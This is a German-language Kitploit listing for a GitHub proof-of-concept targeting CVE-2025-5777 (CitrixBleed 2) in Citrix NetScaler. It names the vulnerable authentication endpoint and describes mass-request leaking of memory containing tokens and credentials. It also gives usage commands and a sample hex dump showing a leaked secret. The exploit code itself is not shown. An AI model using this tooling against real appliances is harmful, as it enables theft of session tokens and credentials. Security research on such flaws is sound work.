Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-5777 — Citrix NetScaler Speicherleck-PoC | Kitploit
Tools/GitHubGitHub/0xgh057r3c0n/cve-2025-5777
SchwachstellenanalyseExploitationInformationsbeschaffungWebsicherheitPenetrationstestsRed Teaming
GitHub0xgh057r3c0n/cve-2025-5777

CVE-2025-5777

Citrix NetScaler Speicherleck-PoC

Repository anzeigen
243vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-5777 - Citrix NetScaler Speicherleck PoC

📌 Beschreibung

Dieses Skript nutzt eine kritische Schwachstelle zur Offenlegung von Speicher in Citrix NetScaler ADC/Gateway-Geräten aus, die als CVE-2025-5777 identifiziert wurde (auch CitrixBleed 2 genannt). Es löst über den Endpunkt /p/u/doAuthentication.do ein Speicherleck aus, das nicht initialisierten Speicher offenlegt, der sensible Daten wie XML-Fragmente, Tokens und möglicherweise Anmeldeinformationen enthält.

  • 📅 CVE-ID: CVE-2025-5777
  • ⚙️ Auswirkung: Informationsoffenlegung
  • 🧑‍💻 Autor: [0xgh057r3c0n]
  • 🧵 Parallelität: Asynchron mit aiohttp
  • 📦 Abhängigkeiten: aiohttp, colorama

🚀 Funktionen

  • Asynchrone Massen-Request-Engine mit asyncio + aiohttp
  • Hex-Dump der durchgesickerten Speicherfragmente
  • Automatische Erkennung des <InitialValue>-Speicherlecks
  • Ausführlicher Modus für Debugging und Antwortvorschau
  • Saubere Unterbrechungsbehandlung (Strg+C)

🧪 Verwendung

python3 CVE-2025-5777.py http://<target> [options]

🔧 Optionen

OptionBeschreibung
-v, --verboseAusführliche Debug-Ausgabe aktivieren
-p <proxy>HTTP-Proxy verwenden (z. B. http://127.0.0.1:8080)
-t <threads>Anzahl gleichzeitiger Anfragen (Standard: 10)

📥 Beispiel

python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5

📤 Beispielausgabe

_____________   _______________         _______________   ________   .________          .___________________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \  |   ____/          |   ____/\______  \______  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/  |____  \   ______  |____  \     /    /   /    /   /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  /       \ /_____/  /       \   /    /   /    /   /    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \/______  /         /______  /  /____/   /____/   /____/  
        \/                  \/                  \/     \/         \/       \/                 \/                             

         Citrix NetScaler Memory Leak PoC (CVE-2025-5777)
                     Author: 0xgh057r3c0n

[🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
[✔️] Found InitialValue Memory Leak!
[🧠] Hex Dump:
------------------------------------------------------------------------
00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21   secret="abcd123!
00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74   @#$%^&*()"</Init
00000020: 69 61 6c 56 61 6c 75 65 3e                        ialValue>
------------------------------------------------------------------------

[✔️] Leak confirmed. Continuing extraction...

⚠️ Haftungsausschluss

Dieser Proof-of-Concept ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bestimmt. Das nicht autorisierte Scannen oder Ausnutzen von Systemen, die dir nicht gehören, ist illegal.


Tool herunterladen